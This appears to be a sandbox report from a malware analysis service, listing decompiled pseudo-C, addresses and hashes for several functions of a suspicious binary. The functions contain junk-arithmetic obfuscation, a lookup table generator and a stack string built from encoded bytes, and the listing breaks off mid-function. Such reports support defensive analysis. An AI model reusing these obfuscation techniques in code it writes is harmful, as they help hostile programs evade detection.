                                                                    				signed int _t196;
                                                                    				signed int _t224;
                                                                    				void* _t239;
                                                                    				char _t240;
                                                                    				signed int _t241;
                                                                    				signed int _t244;
                                                                    				signed int _t246;
                                                                    				signed int _t247;
                                                                    				signed int _t249;
                                                                    				signed int _t250;
                                                                    				signed int _t251;
                                                                    				intOrPtr _t253;
                                                                    				void* _t255;
                                                                    				signed int _t256;
                                                                    				signed int _t257;
                                                                    				void* _t258;
                                                                    				void* _t260;
                                                                    				void* _t262;
                                                                    				void* _t263;
                                                                    				void* _t265;
                                                                    				void* _t266;
                                                                    				void* _t267;
                                                                    
                                                                    				_t258 = __ebp;
                                                                    				_t245 = __esi;
                                                                    				_t239 = __edi;
                                                                    				_t177 = __ebx;
                                                                    				_t263 = _t262 + 4;
                                                                    				if(_a20 != __ebx) {
                                                                    					_t245 = __esi + (__esi & 0x00000052) * 0x53;
                                                                    				}
                                                                    				_t246 = _t245 + 0x1fd3;
                                                                    				if(_a1120 != _t177) {
                                                                    					E0041B960(0x2bf20);
                                                                    				}
                                                                    				_t247 = _t246 + (_t246 & 0x00000042 | 0x00000030) * 0x53;
                                                                    				if(E0041DB30(0x202,  &_a700) != 0) {
                                                                    					L55:
                                                                    					_a1108 = 3;
                                                                    					E00414A10( &_a116);
                                                                    					E00412FD0(_t263 + 0x84);
                                                                    					_a1108 = 1;
                                                                    					E00404500();
                                                                    					_a1108 = _t177;
                                                                    					E00408890(_t263 + 0x160);
                                                                    					_a1108 = 0xffffffff;
                                                                    					_t108 = E00417E20(_t263 + 0x110);
                                                                    					 *[fs:0x0] = _a1100;
                                                                    					return _t108;
                                                                    				} else {
                                                                    					_push(_t258);
                                                                    					_t259 =  *((intOrPtr*)(_t263 + 0x45c));
                                                                    					_push(_t239);
                                                                    					if( *((intOrPtr*)(_t263 + 0x45c)) == _t177) {
                                                                    						E004018E0();
                                                                    					} else {
                                                                    						_v0 = E0041B1B0(_t177, _t177, E004019B0, _t177, _t177,  &_a16);
                                                                    					}
                                                                    					_push( &_a100);
                                                                    					_t249 = _t247 + (_t247 & 0x00000042 | 0x00000010) * 0x53;
                                                                    					_t114 = E00413350();
                                                                    					_t265 = _t263 + 4;
                                                                    					_t240 = _t114;
                                                                    					if(_t249 >= 0x3e) {
                                                                    						_t250 = _t249 ^ 0x0000001a;
                                                                    						__eflags = _t250;
                                                                    					} else {
                                                                    						_t250 = _t249 ^ 0x00000053;
                                                                    					}
                                                                    					 *(_t265 + 0x10) = _t250;
                                                                    					_t251 = 0;
                                                                    					_t116 = E00411F10() - _t177;
                                                                    					if(_t116 == 0) {
                                                                    						_t251 = 1;
                                                                    					} else {
                                                                    						if(_t116 == 1) {
                                                                    							_t251 = 2;
                                                                    						}
                                                                    					}
                                                                    					_t117 =  *0x447b60; // 0x0
                                                                    					 *0x447b60 = _t117 + (_t117 & 0x00000042 | 0x00000010) * 0x53;
                                                                    					E00414AE0(_t259, _t240, _t251);
                                                                    					_t188 =  *0x447b60; // 0x0
                                                                    					E00411DF0(_t188,  &_v0, 0x5c);
                                                                    					_t266 = _t265 + 4;
                                                                    					_a76 = _t240;
                                                                    					_a56 = E0041A7A0(_t177, 1, _t177, _t177);
                                                                    					 *((intOrPtr*)(_t266 + 0x78)) = _t266 + 0x17c;
                                                                    					_t123 = E0041B1B0(_t177, _t177, E00401190,  &_a56, _t177,  &_v12);
                                                                    					_t253 = 0xf;
                                                                    					_t260 = _t123;
                                                                    					 *((intOrPtr*)(_t266 + 0x54)) = 0xf;
                                                                    					 *((intOrPtr*)(_t266 + 0x50)) = _t177;
                                                                    					_a8 = _t177;
                                                                    					_v0 = 0xf;
                                                                    					_v4 = _t177;
                                                                    					_v20 = _t177;
                                                                    					_a1056 = 6;
                                                                    					E00413040(_t266 + 0xcc,  &_a4, _t266 + 0xe0,  &_v24);
                                                                    					_t267 = _t266 + 0x10;
                                                                    					_t192 = _v20;
                                                                    					if(_v0 < 0x10) {
                                                                    						_t192 =  &_a32;
                                                                    					}
                                                                    					_t128 =  *((intOrPtr*)(_t267 + 0x40));
                                                                    					if(_a80 < 0x10) {
                                                                    						_t128 = _t267 + 0x40;
                                                                    					}
                                                                    					_push(_t192);
                                                                    					_push(_t128);
                                                                    					_push(_t267 + 0xc4);
                                                                    					_t131 = E00415200( &_a156, _t267 + 0xc4, _t267 + 0xcc,  &_a176, _t267 + 0xbc, _t267 + 0xbc,  &_a180);
                                                                    					_t263 = _t267 + 0x28;
                                                                    					if(_t240 == _t177 || _t131 == _t177) {
                                                                    						_t241 =  *(_t263 + 0x10);
                                                                    						goto L37;
                                                                    					} else {
                                                                    						_t157 =  *0x447b60; // 0x0
                                                                    						 *0x447b60 = _t157 + (_t157 & 0x00000052 |  *(_t263 + 0x10) & 0x00000030) * 0x53;
                                                                    						if(E0041E570(_t263 + 0x1c0, 0x104) == 0) {
                                                                    							E00407B70(_t263 + 0x1bc);
                                                                    						}
                                                                    						_t281 = _a268 - 0x10;
                                                                    						_t161 =  *((intOrPtr*)(_t263 + 0xfc));
                                                                    						if(_a268 < 0x10) {
                                                                    							_t161 = _t263 + 0xfc;
                                                                    						}
                                                                    						 *((intOrPtr*)(_t263 + 0x118)) = E004157F0(_t281, _t161);
                                                                    						 *((intOrPtr*)(_t263 + 0x94)) = _t263 + 0x16c;
                                                                    						 *((intOrPtr*)(_t263 + 0xa0)) = _t263 + 0x11c;
                                                                    						_t165 =  *0x447b60; // 0x0
                                                                    						 *((intOrPtr*)(_t263 + 0x90)) = _a84;
                                                                    						_t263 = _t263 + 4;
                                                                    						_t244 = 0;
                                                                    						 *((intOrPtr*)(_t263 + 0x94)) =  &_a100;
                                                                    						 *((intOrPtr*)(_t263 + 0x98)) =  &_a116;
                                                                    						if(_t165 >= 0x3e) {
                                                                    							_t166 = _t165 ^ 0x0000001a;
                                                                    							__eflags = _t166;
                                                                    						} else {
                                                                    							_t166 = _t165 ^ 0x00000053;
                                                                    						}
                                                                    						 *0x447b60 = _t166;
                                                                    						_t256 = 0;
                                                                    						do {
                                                                    							 *((intOrPtr*)(_t263 + 0x140 + _t256 * 4)) = E0041B1B0(_t177, _t177, E00416ED0, _t263 + 0x94, _t177,  &_a16);
                                                                    							if(_t244 >= 0x3e) {
                                                                    								_t244 = _t244 ^ 0x0000001a;
                                                                    								__eflags = _t244;
                                                                    							} else {
                                                                    								_t244 = _t244 ^ 0x00000053;
                                                                    							}
                                                                    							_t256 = _t256 + 1;
                                                                    						} while (_t256 < 0xa);
                                                                    						_t168 =  *0x447b60; // 0x0
                                                                    						 *0x447b60 = _t168 + (_t168 & 0x00000052 | _t244 & 0x00000030) * 0x53;
                                                                    						E0041B9C0(0xa, _t263 + 0x148, 1, 0xffffffff);
                                                                    						_t257 = 0;
                                                                    						_t241 = _t244 - 0x46924;
                                                                    						do {
                                                                    							E0041A8E0( *((intOrPtr*)(_t263 + 0x140 + _t257 * 4)));
                                                                    							_t257 = _t257 + 1;
                                                                    						} while (_t257 < 0xa);
                                                                    						_t253 = 0xf;
                                                                    						L37:
                                                                    						if( *((intOrPtr*)(_t263 + 0x460)) != _t177) {
                                                                    							E00411DF0(_t241, 0x447b60, 0x6c);
                                                                    							_t255 =  *((intOrPtr*)(_t263 + 0x20));
                                                                    							_t263 = _t263 + 4;
                                                                    							E0041A830(_t255, 0xffffffff);
                                                                    							_t224 =  *0x447b60; // 0x0
                                                                    							_t241 = _t241 + (_t224 & 0x00000030 | _t241 & 0x00000052) * 0x53;
                                                                    							E0041A8E0(_t255);
                                                                    							_t253 = 0xf;
                                                                    						}
                                                                    						_t196 =  *0x447b60; // 0x0
                                                                    						 *0x447b60 = _t196 + _t241;
                                                                    						E0041A830(_t260, 0xffffffff);
                                                                    						E0041A8E0(_t260);
                                                                    						E00414B10( &_a104);
                                                                    						_t135 =  *((intOrPtr*)(_t263 + 0xa0));
                                                                    						if( *((intOrPtr*)(_t263 + 0xa0)) != _t177) {
                                                                    							E0041AD50(E0041AC50(), _t177, _t135);
                                                                    						}
                                                                    						_t136 =  *((intOrPtr*)(_t263 + 0xb0));
                                                                    						if( *((intOrPtr*)(_t263 + 0xb0)) != _t177) {
                                                                    							E0041AD50(E0041AC50(), _t177, _t136);
                                                                    						}
                                                                    						_t137 =  *0x447b60; // 0x0
                                                                    						if(_t137 >= 0x3e) {
                                                                    							_t138 = _t137 ^ 0x0000001a;
                                                                    							__eflags = _t138;
                                                                    						} else {
                                                                    							_t138 = _t137 ^ 0x00000053;
                                                                    						}
                                                                    						 *0x447b60 = _t138;
                                                                    						_t139 =  *((intOrPtr*)(_t263 + 0xa8));
                                                                    						if( *((intOrPtr*)(_t263 + 0xa8)) != _t177) {
                                                                    							E0041AD50(E0041AC50(), _t177, _t139);
                                                                    						}
                                                                    						_t140 = _a180;
                                                                    						if(_a180 != _t177) {
                                                                    							E0041AD50(E0041AC50(), _t177, _t140);
                                                                    						}
                                                                    						if( *((intOrPtr*)(_t263 + 0x38)) >= 0x10) {
                                                                    							_push(_a32);
                                                                    							L00421F9D();
                                                                    							_t263 = _t263 + 4;
                                                                    						}
                                                                    						 *((intOrPtr*)(_t263 + 0x34)) = _t253;
                                                                    						_a48 = _t177;
                                                                    						_a32 = _t177;
                                                                    						if(_a80 >= 0x10) {
                                                                    							_push( *((intOrPtr*)(_t263 + 0x38)));
                                                                    							L00421F9D();
                                                                    							_t263 = _t263 + 4;
                                                                    						}
                                                                    						_a80 = _t253;
                                                                    						_a76 = _t177;
                                                                    						 *((char*)(_t263 + 0x38)) = _t177;
                                                                    						goto L55;
                                                                    					}
                                                                    				}
                                                                    			}






















































                                                                    0x00413770
                                                                    0x00413770
                                                                    0x00413770
                                                                    0x00413770
                                                                    0x00413774
                                                                    0x00413779
                                                                    0x00413783
                                                                    0x00413783
                                                                    0x0041378c
                                                                    0x00413794
                                                                    0x0041379b
                                                                    0x0041379b
                                                                    0x004137b8
                                                                    0x004137c1
                                                                    0x00413be7
                                                                    0x00413beb
                                                                    0x00413bf3
                                                                    0x00413bff
                                                                    0x00413c08
                                                                    0x00413c10
                                                                    0x00413c1c
                                                                    0x00413c23
                                                                    0x00413c2f
                                                                    0x00413c3a
                                                                    0x00413c48
                                                                    0x00413c55
                                                                    0x004137c7
                                                                    0x004137c7
                                                                    0x004137c8
                                                                    0x004137d1
                                                                    0x004137d2
                                                                    0x004137ed
                                                                    0x004137d4
                                                                    0x004137e7
                                                                    0x004137e7
                                                                    0x00413801
                                                                    0x00413802
                                                                    0x00413804
                                                                    0x00413809
                                                                    0x0041380f
                                                                    0x00413811
                                                                    0x00413818
                                                                    0x00413818
                                                                    0x00413813
                                                                    0x00413813
                                                                    0x00413813
                                                                    0x0041381b
                                                                    0x0041381f
                                                                    0x00413826
                                                                    0x00413828
                                                                    0x00413834
                                                                    0x0041382a
                                                                    0x0041382b
                                                                    0x0041382d
                                                                    0x0041382d
                                                                    0x0041382b
                                                                    0x00413839
                                                                    0x00413855
                                                                    0x0041385a
                                                                    0x0041385f
                                                                    0x0041386b
                                                                    0x00413870
                                                                    0x00413878
                                                                    0x00413891
                                                                    0x0041389e
                                                                    0x004138a2
                                                                    0x004138a7
                                                                    0x004138ac
                                                                    0x004138ae
                                                                    0x004138b2
                                                                    0x004138b6
                                                                    0x004138ba
                                                                    0x004138be
                                                                    0x004138c2
                                                                    0x004138e0
                                                                    0x004138e8
                                                                    0x004138f6
                                                                    0x004138fb
                                                                    0x004138ff
                                                                    0x00413901
                                                                    0x00413901
                                                                    0x00413909
                                                                    0x0041390d
                                                                    0x0041390f
                                                                    0x0041390f
                                                                    0x00413913
                                                                    0x00413914
                                                                    0x0041391c
                                                                    0x00413955
                                                                    0x0041395a
                                                                    0x0041395f
                                                                    0x00413aba
                                                                    0x00000000
                                                                    0x0041396d
                                                                    0x0041396d
                                                                    0x00413985
                                                                    0x0041399e
                                                                    0x004139af
                                                                    0x004139af
                                                                    0x004139b4
                                                                    0x004139bc
                                                                    0x004139c3
                                                                    0x004139c5
                                                                    0x004139c5
                                                                    0x004139d6
                                                                    0x004139e4
                                                                    0x004139f2
                                                                    0x004139f9
                                                                    0x004139fe
                                                                    0x00413a05
                                                                    0x00413a08
                                                                    0x00413a15
                                                                    0x00413a1c
                                                                    0x00413a23
                                                                    0x00413a2a
                                                                    0x00413a2a
                                                                    0x00413a25
                                                                    0x00413a25
                                                                    0x00413a25
                                                                    0x00413a2d
                                                                    0x00413a32
                                                                    0x00413a34
                                                                    0x00413a51
                                                                    0x00413a58
                                                                    0x00413a5f
                                                                    0x00413a5f
                                                                    0x00413a5a
                                                                    0x00413a5a
                                                                    0x00413a5a
                                                                    0x00413a62
                                                                    0x00413a63
                                                                    0x00413a68
                                                                    0x00413a80
                                                                    0x00413a91
                                                                    0x00413a96
                                                                    0x00413a98
                                                                    0x00413aa0
                                                                    0x00413aa8
                                                                    0x00413aad
                                                                    0x00413aae
                                                                    0x00413ab3
                                                                    0x00413abe
                                                                    0x00413ac5
                                                                    0x00413ad0
                                                                    0x00413ad5
                                                                    0x00413ad9
                                                                    0x00413adf
                                                                    0x00413ae4
                                                                    0x00413af8
                                                                    0x00413afa
                                                                    0x00413aff
                                                                    0x00413aff
                                                                    0x00413b04
                                                                    0x00413b0f
                                                                    0x00413b15
                                                                    0x00413b1b
                                                                    0x00413b24
                                                                    0x00413b29
                                                                    0x00413b32
                                                                    0x00413b3c
                                                                    0x00413b3c
                                                                    0x00413b41
                                                                    0x00413b4a
                                                                    0x00413b54
                                                                    0x00413b54
                                                                    0x00413b59
                                                                    0x00413b61
                                                                    0x00413b68
                                                                    0x00413b68
                                                                    0x00413b63
                                                                    0x00413b63
                                                                    0x00413b63
                                                                    0x00413b6b
                                                                    0x00413b70
                                                                    0x00413b79
                                                                    0x00413b83
                                                                    0x00413b83
                                                                    0x00413b88
                                                                    0x00413b91
                                                                    0x00413b9b
                                                                    0x00413b9b
                                                                    0x00413bab
                                                                    0x00413bb1
                                                                    0x00413bb2
                                                                    0x00413bb7
                                                                    0x00413bb7
                                                                    0x00413bbf
                                                                    0x00413bc3
                                                                    0x00413bc7
                                                                    0x00413bcc
                                                                    0x00413bd2
                                                                    0x00413bd3
                                                                    0x00413bd8
                                                                    0x00413bd8
                                                                    0x00413bdb
                                                                    0x00413bdf
                                                                    0x00413be3
                                                                    0x00000000
                                                                    0x00413be3
                                                                    0x0041395f

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: ecbaf3175adf2171257b618f0ab9a7f8dbce75121ce7976675b516b03d7dd8bb
                                                                    • Instruction ID: 5daaf08c5549c31ab90b82473e4b88421e84608449a7380cacc5f5be0e3c485a
                                                                    • Opcode Fuzzy Hash: ecbaf3175adf2171257b618f0ab9a7f8dbce75121ce7976675b516b03d7dd8bb
                                                                    • Instruction Fuzzy Hash: 9AD1C6B69083809BD324DF65CC91EEFB7E9AB84704F444D2FF68983241E738A945875B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0042C297() {
                                                                    				char _v4;
                                                                    				void* _t14;
                                                                    				void* _t15;
                                                                    				unsigned int _t16;
                                                                    				unsigned int _t17;
                                                                    				signed int _t35;
                                                                    				signed int _t37;
                                                                    				void* _t44;
                                                                    				signed int _t46;
                                                                    				intOrPtr* _t49;
                                                                    				signed int _t51;
                                                                    				intOrPtr* _t58;
                                                                    				intOrPtr _t68;
                                                                    
                                                                    				_t68 =  *0x447a98; // 0x1
                                                                    				if(_t68 == 0) {
                                                                    					goto L15;
                                                                    				} else {
                                                                    					_t51 = 0;
                                                                    					 *0x447a98 = 0;
                                                                    					_t15 = 0;
                                                                    					do {
                                                                    						_t35 = 0x1f;
                                                                    						_t51 = _t51 | 1 << _t35;
                                                                    						_t15 = _t15 + 1;
                                                                    					} while (_t15 < 0xe);
                                                                    					_t37 = 0;
                                                                    					do {
                                                                    						_t16 = _t37;
                                                                    						_t44 = 8;
                                                                    						do {
                                                                    							if((_t16 & 0x00000001) == 0) {
                                                                    								_t16 = _t16 >> 1;
                                                                    								__eflags = _t16;
                                                                    							} else {
                                                                    								_t16 = _t16 >> 0x00000001 ^ _t51;
                                                                    							}
                                                                    							_t44 = _t44 - 1;
                                                                    						} while (_t44 != 0);
                                                                    						 *(0x448ec8 + _t37 * 4) = _t16;
                                                                    						_t37 = _t37 + 1;
                                                                    					} while (_t37 < 0x100);
                                                                    					_t49 = 0x449ec8;
                                                                    					do {
                                                                    						_t6 = _t49 - 0x1000; // 0x0
                                                                    						_t17 =  *_t6;
                                                                    						_t46 = _t17 >> 8;
                                                                    						 *_t49 = ((_t17 & 0x0000ff00) + (_t17 << 0x10) << 8) + (_t46 & 0x0000ff00) + (_t17 >> 0x18);
                                                                    						_t7 = _t49 + 0x400; // 0x44a2c8
                                                                    						_t58 = _t7;
                                                                    						_v4 = 3;
                                                                    						do {
                                                                    							_t17 =  *(0x448ec8 + (_t17 & 0x000000ff) * 4) ^ _t46;
                                                                    							_t46 = _t17 >> 8;
                                                                    							 *(_t58 - 0x1000) = _t17;
                                                                    							 *_t58 = ((_t17 & 0x0000ff00) + (_t17 << 0x10) << 8) + (_t46 & 0x0000ff00) + (_t17 >> 0x18);
                                                                    							_t58 = _t58 + 0x400;
                                                                    							_t12 =  &_v4;
                                                                    							 *_t12 = _v4 - 1;
                                                                    						} while ( *_t12 != 0);
                                                                    						_t49 = _t49 + 4;
                                                                    					} while (_t49 < 0x44a2c8);
                                                                    					 *0x447a94 = 0;
                                                                    					return _t17;
                                                                    				}
                                                                    				do {
                                                                    					goto L15;
                                                                    				} while (__eflags != 0);
                                                                    				return _t14;
                                                                    				L15:
                                                                    				__eflags =  *0x447a94; // 0x1
                                                                    			}
















                                                                    0x0042c29b
                                                                    0x0042c2a1
                                                                    0x00000000
                                                                    0x0042c2a7
                                                                    0x0042c2aa
                                                                    0x0042c2ac
                                                                    0x0042c2b2
                                                                    0x0042c2b4
                                                                    0x0042c2be
                                                                    0x0042c2c6
                                                                    0x0042c2c8
                                                                    0x0042c2c9
                                                                    0x0042c2ce
                                                                    0x0042c2d0
                                                                    0x0042c2d2
                                                                    0x0042c2d4
                                                                    0x0042c2d5
                                                                    0x0042c2d7
                                                                    0x0042c2df
                                                                    0x0042c2df
                                                                    0x0042c2d9
                                                                    0x0042c2db
                                                                    0x0042c2db
                                                                    0x0042c2e1
                                                                    0x0042c2e1
                                                                    0x0042c2e4
                                                                    0x0042c2eb
                                                                    0x0042c2ec
                                                                    0x0042c2f4
                                                                    0x0042c2fe
                                                                    0x0042c2fe
                                                                    0x0042c2fe
                                                                    0x0042c311
                                                                    0x0042c324
                                                                    0x0042c326
                                                                    0x0042c326
                                                                    0x0042c32c
                                                                    0x0042c334
                                                                    0x0042c340
                                                                    0x0042c34f
                                                                    0x0042c362
                                                                    0x0042c368
                                                                    0x0042c36a
                                                                    0x0042c370
                                                                    0x0042c370
                                                                    0x0042c370
                                                                    0x0042c376
                                                                    0x0042c379
                                                                    0x0042c387
                                                                    0x00000000
                                                                    0x0042c391
                                                                    0x0042c394
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042c39e
                                                                    0x0042c394
                                                                    0x0042c394

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1e3946d82ae84f93e9f65b599b99a066dec9c782420993e7dc82ec9afc658c0e
                                                                    • Instruction ID: e0f280ab9d56a6d5743f2df1800f16d563a9bd3ac08461a276ccbb397023b101
                                                                    • Opcode Fuzzy Hash: 1e3946d82ae84f93e9f65b599b99a066dec9c782420993e7dc82ec9afc658c0e
                                                                    • Instruction Fuzzy Hash: D621F3B3B5072647E3188EA9AC8135E72C1A3D5314F95863EEA48D3781EAB94C4286C8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    			E00424278(signed int* __eax, void* __ebx, signed int __edx, char _a4, signed int _a8, intOrPtr _a12) {
                                                                    				intOrPtr _v8;
                                                                    				char _v12;
                                                                    				void* __ebp;
                                                                    				signed int* _t43;
                                                                    				char _t44;
                                                                    				void* _t46;
                                                                    				void* _t49;
                                                                    				intOrPtr* _t53;
                                                                    				void* _t54;
                                                                    				void* _t65;
                                                                    				signed int _t66;
                                                                    				signed int* _t80;
                                                                    				signed int* _t82;
                                                                    				void* _t84;
                                                                    				signed int _t86;
                                                                    				void* _t89;
                                                                    				void* _t95;
                                                                    				void* _t96;
                                                                    				void* _t99;
                                                                    				void* _t106;
                                                                    
                                                                    				_t43 = _t84;
                                                                    				_t65 = __ebx + 2;
                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                    				_t89 = _t95;
                                                                    				_t96 = _t95 - 8;
                                                                    				_push(_t65);
                                                                    				_push(_t84);
                                                                    				_push(_t89);
                                                                    				asm("cld");
                                                                    				_t66 = _a8;
                                                                    				_t44 = _a4;
                                                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                    					_push(_t89);
                                                                    					E004223C2(_t66, 0xffffffff);
                                                                    					_t46 = 1;
                                                                    				} else {
                                                                    					_v12 = _t44;
                                                                    					_v8 = _a12;
                                                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                    					_t86 =  *(_t66 + 0xc);
                                                                    					_t80 =  *(_t66 + 8);
                                                                    					_t49 = E00427AC2(_t66);
                                                                    					_t99 = _t96 + 4;
                                                                    					if(_t49 == 0) {
                                                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                    						goto L11;
                                                                    					} else {
                                                                    						while(_t86 != 0xffffffff) {
                                                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                    							if(_t53 == 0) {
                                                                    								L8:
                                                                    								_t80 =  *(_t66 + 8);
                                                                    								_t86 = _t80[_t86 + _t86 * 2];
                                                                    								continue;
                                                                    							} else {
                                                                    								_t54 =  *_t53();
                                                                    								_t89 = _t89;
                                                                    								_t86 = _t86;
                                                                    								_t66 = _a8;
                                                                    								_t55 = _t54;
                                                                    								_t106 = _t54;
                                                                    								if(_t106 == 0) {
                                                                    									goto L8;
                                                                    								} else {
                                                                    									if(_t106 < 0) {
                                                                    										_t46 = 0;
                                                                    									} else {
                                                                    										_t82 =  *(_t66 + 8);
                                                                    										E00422380(_t55, _t66);
                                                                    										_t89 = _t66 + 0x10;
                                                                    										E004223C2(_t66, 0);
                                                                    										_t99 = _t99 + 0xc;
                                                                    										E00422456(_t82[2]);
                                                                    										 *(_t66 + 0xc) =  *_t82;
                                                                    										_t66 = 0;
                                                                    										_t86 = 0;
                                                                    										 *(_t82[2])(1);
                                                                    										goto L8;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							goto L13;
                                                                    						}
                                                                    						L11:
                                                                    						_t46 = 1;
                                                                    					}
                                                                    				}
                                                                    				L13:
                                                                    				return _t46;
                                                                    			}























                                                                    0x0042427c
                                                                    0x0042427d
                                                                    0x0042427e
                                                                    0x00424281
                                                                    0x00424283
                                                                    0x00424286
                                                                    0x00424287
                                                                    0x00424289
                                                                    0x0042428a
                                                                    0x0042428b
                                                                    0x0042428e
                                                                    0x00424298
                                                                    0x00424349
                                                                    0x00424350
                                                                    0x00424359
                                                                    0x0042429e
                                                                    0x0042429e
                                                                    0x004242a4
                                                                    0x004242aa
                                                                    0x004242ad
                                                                    0x004242b0
                                                                    0x004242b4
                                                                    0x004242b9
                                                                    0x004242be
                                                                    0x0042433e
                                                                    0x00000000
                                                                    0x004242c0
                                                                    0x004242c0
                                                                    0x004242cc
                                                                    0x004242ce
                                                                    0x00424329
                                                                    0x00424329
                                                                    0x0042432f
                                                                    0x00000000
                                                                    0x004242d0
                                                                    0x004242df
                                                                    0x004242e1
                                                                    0x004242e2
                                                                    0x004242e3
                                                                    0x004242e6
                                                                    0x004242e6
                                                                    0x004242e8
                                                                    0x00000000
                                                                    0x004242ea
                                                                    0x004242ea
                                                                    0x00424334
                                                                    0x004242ec
                                                                    0x004242ec
                                                                    0x004242f0
                                                                    0x004242f8
                                                                    0x004242fd
                                                                    0x00424302
                                                                    0x0042430e
                                                                    0x00424316
                                                                    0x0042431d
                                                                    0x00424323
                                                                    0x00424327
                                                                    0x00000000
                                                                    0x00424327
                                                                    0x004242ea
                                                                    0x004242e8
                                                                    0x00000000
                                                                    0x004242ce
                                                                    0x00424342
                                                                    0x00424342
                                                                    0x00424342
                                                                    0x004242be
                                                                    0x0042435e
                                                                    0x00424365

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 646ce8c473bae79635a3e799a9b89a3e0cc17d367c486aad0ee9c178da65970a
                                                                    • Instruction ID: 5409675108b6f6ba2729380ef120b9ffe27056ea433894eea45f70eb7920dc77
                                                                    • Opcode Fuzzy Hash: 646ce8c473bae79635a3e799a9b89a3e0cc17d367c486aad0ee9c178da65970a
                                                                    • Instruction Fuzzy Hash: F921B632B00214ABCB10EF69D8C08ABBBA5FF84350B85816AED55DB245D734F915CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041B250(intOrPtr _a4) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				intOrPtr* _t17;
                                                                    				void* _t20;
                                                                    				CHAR* _t23;
                                                                    
                                                                    				_t17 =  *0x447e34;
                                                                    				if(_t17 == 0) {
                                                                    					_v15 = 0xbc;
                                                                    					_v12 = 0xbc;
                                                                    					 *_t23 = 0x9e;
                                                                    					_v14 = 0xad;
                                                                    					_v13 = 0x8f;
                                                                    					_v11 = 0xab;
                                                                    					_v10 = 0xaa;
                                                                    					_v9 = 0xb0;
                                                                    					_v8 = 0xb6;
                                                                    					_v7 = 0xb7;
                                                                    					_v6 = 0x9c;
                                                                    					_v5 = 0xa1;
                                                                    					_v4 = 0x98;
                                                                    					_v3 = 0xd9;
